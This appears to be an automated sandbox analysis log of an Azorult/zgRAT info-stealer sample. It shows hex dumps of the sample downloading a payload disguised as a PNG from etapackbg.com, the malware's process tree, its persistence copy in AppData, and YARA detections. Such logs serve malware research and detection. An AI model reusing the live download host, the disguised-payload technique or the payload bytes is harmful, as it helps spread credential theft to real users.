                                                                    Feb 26, 2022 10:20:20.069483042 CET20355INData Raw: 8f 30 71 84 56 36 a0 4d ae fc 0a 17 9b 52 aa 5b a6 29 40 a5 3c 17 e6 cf 79 1b ba ea 54 e2 aa dc f2 2f d8 49 eb 29 18 47 5e 24 da e8 53 20 55 e0 1c 33 ad 91 9f 05 34 e8 b8 d6 d3 46 16 3b 0b 73 c6 1b 93 74 d8 c0 32 1d d1 2b c0 7c 16 7f dd 4b d2 34
                                                                    Data Ascii: 0qV6MR[)@<yT/I)G^$S U34F;st2+|K4,^H'O}Bm7vef19J#3W`$S^nUk&A89J_S]Jjs.ZFy-$lz%GpsYT$,3JC.4'Ws}t|f
                                                                    Feb 26, 2022 10:20:20.069526911 CET20356INData Raw: 52 74 fc 5d 00 b1 a2 28 4d d5 b7 f2 38 f6 49 f4 69 68 62 29 36 b1 5f 9b 1c 15 e8 71 d3 4a 43 2c 11 8f 44 37 f3 d7 a0 04 34 81 06 ed f0 35 58 03 ba 28 4d 35 a8 30 d5 94 a9 fd 04 3b c2 3e 57 4a 41 a1 68 1b cc 3c 54 59 a1 07 17 08 a5 ec 11 76 ba ea
                                                                    Data Ascii: Rt](M8Iihb)6_qJC,D745X(M50;>WJAh<TYvSvM!c,yc't8=(6v*uI I:x:H>YzAFxDkP$~*x]*X_=d#$%uX&G:sBA<,84hL`-\Qq
                                                                    Feb 26, 2022 10:20:20.069572926 CET20357INData Raw: fb 8e a9 85 6e a2 0d ea 5e ab e1 b8 05 70 04 c4 9e 67 76 f0 c1 c0 19 87 f2 71 6a b9 dc bd 36 80 ef f4 2b 67 fa aa 03 f2 58 d0 cb 03 8c 4a 93 bb ef 04 c0 5b d0 cd 26 df a3 68 ec b5 01 6d e8 a5 29 e1 58 80 04 ba d9 4c 0e 3b 4c 73 11 40 a1 46 b8 51
                                                                    Data Ascii: n^pgvqj6+gXJ[&hm)XL;Ls@FQi-ck@?E<:s^G7GVqk*j{(f`0?o~yJrFix}U` V?tueK[lzVKZs#9oWkat#W~W7
                                                                    Feb 26, 2022 10:20:20.069618940 CET20359INData Raw: 73 01 2d 12 a5 59 b9 c8 66 58 c1 6c 69 e6 b0 85 17 c0 a6 e9 d8 bd 8e 6f 27 9e 92 07 2f 64 dd cd 76 1d 2b 0d 07 bd 11 c4 9e 8d 50 c6 05 9b ed 83 a6 99 a0 d0 74 c9 a3 0b 81 6c 03 7b 98 cd b5 b1 95 17 c0 8a 05 f3 9c be 60 e4 5a 40 eb b4 01 c6 bc df
                                                                    Data Ascii: s-YfXlio'/dv+Ptl{`Z@:t~[Y}6S]K* Ew&]4$$f>xWst11}NeZ3s@P;Libhtg$FPLnFi>GWHQ+>\
                                                                    Feb 26, 2022 10:20:20.069663048 CET20360INData Raw: b7 91 47 c1 af a7 28 a0 a0 23 36 01 8b be bf 80 45 dd a0 28 db 5e 11 1f 55 4b 3b 6a d0 c7 f3 21 27 aa 4b 5c 4b a5 74 59 07 3d b1 1e d0 5b 54 2c 1f 22 cb 1f 61 0f 3e 1e 03 7c 55 3c 3b 5c 32 f5 33 3f 2a c1 4e b9 bf d2 1c 7b 42 e9 cf b8 fb 13 00 98
                                                                    Data Ascii: G(#6E(^UK;j!'K\KtY=[T,"a>|U<;\23?*N{B7Do0`{%}OvjVcpp6%<nNX<F`yI4dAaPiTbcm+!ymp7w~Fg;w;M!F'
                                                                    Feb 26, 2022 10:20:20.069705963 CET20362INData Raw: 91 42 b0 f2 c3 86 b3 fc b7 df 8a c5 c0 6c b5 9a b6 7f 41 7b d8 bf 70 0c f3 5d fe 04 03 0f 61 eb 2f ab fb 33 d2 f2 41 e9 fc c2 27 e2 99 e6 b8 a7 b0 4d c6 74 be ff 13 b4 46 d4 2f 5a f0 c8 5e a8 b0 47 46 be e3 13 d5 02 71 d1 77 f4 34 f7 e2 2c a0 06
                                                                    Data Ascii: BlA{p]a/3A'MtF/Z^GFqw4,[|3do|tg!nOOOCSR]wii.Zdt4Ic^wmrn[:dJ3N_oC%:%W+@7hj)$~
                                                                    Feb 26, 2022 10:20:20.069747925 CET20363INData Raw: 7d d7 f6 22 0a 0a 82 7b 5f f7 03 3b 7e 8d f3 c8 d3 51 85 db c3 cd 0d e1 08 cb 87 2e ce 86 89 99 18 80 85 6c b6 de bd 4a c7 97 02 cb da 21 da 47 d2 4c df c0 da 02 b8 72 83 c7 de c1 10 68 f5 54 8d 76 d1 84 00 ad 3c 21 20 cd f4 25 38 84 d8 8a 1e fa
                                                                    Data Ascii: }"{_;~Q.lJ!GLrhTv<! %8k%aP` !M#37AGuIxNTV,7#]Iyy~kBb>'iJsxO?3t?+='\zu;l9XBK/]U%


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.549794104.21.89.25080C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 26, 2022 10:20:29.543524027 CET21045OUTGET /css/Sngggz.png HTTP/1.1
                                                                    Host: etapackbg.com
                                                                    Connection: Keep-Alive
                                                                    Feb 26, 2022 10:20:29.588521957 CET21047INHTTP/1.1 200 OK
                                                                    Date: Sat, 26 Feb 2022 09:20:29 GMT
                                                                    Content-Type: image/png
                                                                    Content-Length: 657920
                                                                    Connection: keep-alive
                                                                    cache-control: public, max-age=604800
                                                                    expires: Sat, 05 Mar 2022 08:45:25 GMT
                                                                    last-modified: Fri, 25 Feb 2022 00:36:02 GMT
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    CF-Cache-Status: HIT
                                                                    Age: 2104
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N%2BEjrlrDBBIkgYCh2Ai%2BWsZ0L5V48QaG0kEKl8DTlwoWyW7FmgUJVKTBIVxcym%2FdZHTQ5vfr3ECEy2KtsJXMa5UZF0Vy4Bv8x3L9aO4TwNKUIGyEHKo8fs9TbCt8GVE4"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 6e381908ad929048-FRA
                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                    Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 40 00 00 00 0c 00 0a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: 1@
                                                                    Feb 26, 2022 10:20:29.588579893 CET21048INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 00 36 00 34 00 36 00 2e 00 31 00 39 00 30 00 38 00 2e 00 30 00
                                                                    Data Ascii: 5646.1908.0.1noisreV ylbmessAD5646.1908.0.1noisreVtcudorP@emaNtcudorP"lld.dmm
                                                                    Feb 26, 2022 10:20:29.588620901 CET21049INData Raw: 79 29 fe 75 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 04 c7 4d 62 18 08 f1 7b 86 eb 86 d3 91 2a d7
                                                                    Data Ascii: y)uMb{*:5S~NC,o~O]}e[Y9#C*)"DVe|90'(~pK`KD8ma"q9B*LgoEZ7!
                                                                    Feb 26, 2022 10:20:29.588660955 CET21051INData Raw: 40 8b 8c 96 38 c8 14 6f b5 ed 59 94 2e 18 17 b5 a2 82 49 c3 68 85 c3 c3 99 d0 67 27 58 e4 35 3e 70 d7 38 d2 09 ad f7 cd d0 09 37 e2 1d fd 0f ed e3 82 73 ee bd ef 5e 0d 0e 72 a1 59 a5 bb c3 77 d0 5a 75 b2 79 c5 01 81 48 d2 aa 17 f6 3a 6a cb 69 1b
                                                                    Data Ascii: @8oY.Ihg'X5>p87s^rYwZuyH:ji0?|});2S4k]EUPb,)NIb-M/H*3bb``R)*,O,(JKKH``d\^\LoOH]HU#,B
                                                                    Feb 26, 2022 10:20:29.588700056 CET21052INData Raw: da e0 8f 30 71 84 56 36 a0 4d ae fc 0a 17 9b 52 aa 5b a6 29 40 a5 3c 17 e6 cf 79 1b ba ea 54 e2 aa dc f2 2f d8 49 eb 29 18 47 5e 24 da e8 53 20 55 e0 1c 33 ad 91 9f 05 34 e8 b8 d6 d3 46 16 3b 0b 73 c6 1b 93 74 d8 c0 32 1d d1 2b c0 7c 16 7f dd 4b
                                                                    Data Ascii: 0qV6MR[)@<yT/I)G^$S U34F;st2+|K4,^H'O}Bm7vef19J#3W`$S^nUk&A89J_S]Jjs.ZFy-$lz%GpsYT$,3JC.4'Ws}t|
                                                                    Feb 26, 2022 10:20:29.588741064 CET21054INData Raw: ee 5b 52 74 fc 5d 00 b1 a2 28 4d d5 b7 f2 38 f6 49 f4 69 68 62 29 36 b1 5f 9b 1c 15 e8 71 d3 4a 43 2c 11 8f 44 37 f3 d7 a0 04 34 81 06 ed f0 35 58 03 ba 28 4d 35 a8 30 d5 94 a9 fd 04 3b c2 3e 57 4a 41 a1 68 1b cc 3c 54 59 a1 07 17 08 a5 ec 11 76
                                                                    Data Ascii: [Rt](M8Iihb)6_qJC,D745X(M50;>WJAh<TYvSvM!c,yc't8=(6v*uI I:x:H>YzAFxDkP$~*x]*X_=d#$%uX&G:sBA<,84hL`-\Q
                                                                    Feb 26, 2022 10:20:29.588781118 CET21055INData Raw: fb ba fb 8e a9 85 6e a2 0d ea 5e ab e1 b8 05 70 04 c4 9e 67 76 f0 c1 c0 19 87 f2 71 6a b9 dc bd 36 80 ef f4 2b 67 fa aa 03 f2 58 d0 cb 03 8c 4a 93 bb ef 04 c0 5b d0 cd 26 df a3 68 ec b5 01 6d e8 a5 29 e1 58 80 04 ba d9 4c 0e 3b 4c 73 11 40 a1 46
                                                                    Data Ascii: n^pgvqj6+gXJ[&hm)XL;Ls@FQi-ck@?E<:s^G7GVqk*j{(f`0?o~yJrFix}U` V?tueK[lzVKZs#9oWkat#W~W7
                                                                    Feb 26, 2022 10:20:29.588820934 CET21056INData Raw: 5d 7d 73 01 2d 12 a5 59 b9 c8 66 58 c1 6c 69 e6 b0 85 17 c0 a6 e9 d8 bd 8e 6f 27 9e 92 07 2f 64 dd cd 76 1d 2b 0d 07 bd 11 c4 9e 8d 50 c6 05 9b ed 83 a6 99 a0 d0 74 c9 a3 0b 81 6c 03 7b 98 cd b5 b1 95 17 c0 8a 05 f3 9c be 60 e4 5a 40 eb b4 01 c6
                                                                    Data Ascii: ]}s-YfXlio'/dv+Ptl{`Z@:t~[Y}6S]K* Ew&]4$$f>xWst11}NeZ3s@P;Libhtg$FPLnFi>GWHQ+
                                                                    Feb 26, 2022 10:20:29.588854074 CET21058INData Raw: a7 6e b7 91 47 c1 af a7 28 a0 a0 23 36 01 8b be bf 80 45 dd a0 28 db 5e 11 1f 55 4b 3b 6a d0 c7 f3 21 27 aa 4b 5c 4b a5 74 59 07 3d b1 1e d0 5b 54 2c 1f 22 cb 1f 61 0f 3e 1e 03 7c 55 3c 3b 5c 32 f5 33 3f 2a c1 4e b9 bf d2 1c 7b 42 e9 cf b8 fb 13
                                                                    Data Ascii: nG(#6E(^UK;j!'K\KtY=[T,"a>|U<;\23?*N{B7Do0`{%}OvjVcpp6%<nNX<F`yI4dAaPiTbcm+!ymp7w~Fg;w;M!F'
                                                                    Feb 26, 2022 10:20:29.588893890 CET21059INData Raw: 49 0b 91 42 b0 f2 c3 86 b3 fc b7 df 8a c5 c0 6c b5 9a b6 7f 41 7b d8 bf 70 0c f3 5d fe 04 03 0f 61 eb 2f ab fb 33 d2 f2 41 e9 fc c2 27 e2 99 e6 b8 a7 b0 4d c6 74 be ff 13 b4 46 d4 2f 5a f0 c8 5e a8 b0 47 46 be e3 13 d5 02 71 d1 77 f4 34 f7 e2 2c
                                                                    Data Ascii: IBlA{p]a/3A'MtF/Z^GFqw4,[|3do|tg!nOOOCSR]wii.Zdt4Ic^wmrn[:dJ3N_oC%:%W+@7hj)$~
                                                                    Feb 26, 2022 10:20:29.588933945 CET21061INData Raw: 4f 33 7d d7 f6 22 0a 0a 82 7b 5f f7 03 3b 7e 8d f3 c8 d3 51 85 db c3 cd 0d e1 08 cb 87 2e ce 86 89 99 18 80 85 6c b6 de bd 4a c7 97 02 cb da 21 da 47 d2 4c df c0 da 02 b8 72 83 c7 de c1 10 68 f5 54 8d 76 d1 84 00 ad 3c 21 20 cd f4 25 38 84 d8 8a
                                                                    Data Ascii: O3}"{_;~Q.lJ!GLrhTv<! %8k%aP` !M#37AGuIxNTV,7#]Iyy~kBb>'iJsxO?3t?+='\zu;l9XBK/]U


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:10:18:30
                                                                    Start date:26/02/2022
                                                                    Path:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\6CJfScEKhr.exe"
                                                                    Imagebase:0x4f0000
                                                                    File size:196608 bytes
                                                                    MD5 hash:8620EEAF925B0C5943C5B0A217797A32
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.407150230.0000000003B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.407150230.0000000003B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.407150230.0000000003B21000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_gzRat, Description: Yara detected gzRat, Source: 00000000.00000002.407850693.000000000BE90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.407850693.000000000BE90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.407850693.000000000BE90000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.406249935.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.406249935.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.406249935.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.405740272.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_gzRat, Description: Yara detected gzRat, Source: 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Target ID:2
                                                                    Start time:10:18:32
                                                                    Start date:26/02/2022
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                                                                    Imagebase:0x150000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:3
                                                                    Start time:10:18:32
                                                                    Start date:26/02/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7ecfc0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:4
                                                                    Start time:10:18:33
                                                                    Start date:26/02/2022
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout 20
                                                                    Imagebase:0x1340000
                                                                    File size:26112 bytes
                                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:14
                                                                    Start time:10:19:45
                                                                    Start date:26/02/2022
                                                                    Path:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    Imagebase:0x850000
                                                                    File size:196608 bytes
                                                                    MD5 hash:8620EEAF925B0C5943C5B0A217797A32
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000E.00000002.525349365.0000000004808000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Azorult_1, Description: Azorult Payload, Source: 0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                    • Rule: Azorult, Description: detect Azorult in memory, Source: 0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000E.00000002.525326784.00000000047F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000E.00000000.403321697.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000E.00000000.403321697.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Azorult_1, Description: Azorult Payload, Source: 0000000E.00000000.403321697.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                    • Rule: Azorult, Description: detect Azorult in memory, Source: 0000000E.00000000.403321697.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000E.00000000.403775181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000E.00000000.403775181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Azorult_1, Description: Azorult Payload, Source: 0000000E.00000000.403775181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                    • Rule: Azorult, Description: detect Azorult in memory, Source: 0000000E.00000000.403775181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Azorult_1, Description: Azorult Payload, Source: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                    • Rule: Azorult, Description: detect Azorult in memory, Source: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000E.00000000.402524127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000E.00000000.402524127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Azorult_1, Description: Azorult Payload, Source: 0000000E.00000000.402524127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                    • Rule: Azorult, Description: detect Azorult in memory, Source: 0000000E.00000000.402524127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000E.00000000.402885895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000E.00000000.402885895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Azorult_1, Description: Azorult Payload, Source: 0000000E.00000000.402885895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                    • Rule: Azorult, Description: detect Azorult in memory, Source: 0000000E.00000000.402885895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Target ID:15
                                                                    Start time:10:19:54
                                                                    Start date:26/02/2022
                                                                    Path:C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe"
                                                                    Imagebase:0x170000
                                                                    File size:196608 bytes
                                                                    MD5 hash:8620EEAF925B0C5943C5B0A217797A32
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000F.00000002.517932423.0000000002548000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_gzRat, Description: Yara detected gzRat, Source: 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_gzRat, Description: Yara detected gzRat, Source: 0000000F.00000002.523563780.000000000BB30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000F.00000002.523563780.000000000BB30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 0000000F.00000002.523563780.000000000BB30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low

                                                                    General

                                                                    Target ID:18
                                                                    Start time:10:19:56
                                                                    Start date:26/02/2022
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                                                                    Imagebase:0x150000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:19
                                                                    Start time:10:19:57
                                                                    Start date:26/02/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7ecfc0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:20
                                                                    Start time:10:19:57
                                                                    Start date:26/02/2022
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout 20
                                                                    Imagebase:0x1340000
                                                                    File size:26112 bytes
                                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:21
                                                                    Start time:10:20:02
                                                                    Start date:26/02/2022
                                                                    Path:C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe"
                                                                    Imagebase:0xc60000
                                                                    File size:196608 bytes
                                                                    MD5 hash:8620EEAF925B0C5943C5B0A217797A32
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_gzRat, Description: Yara detected gzRat, Source: 00000015.00000002.524573757.000000000C4B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
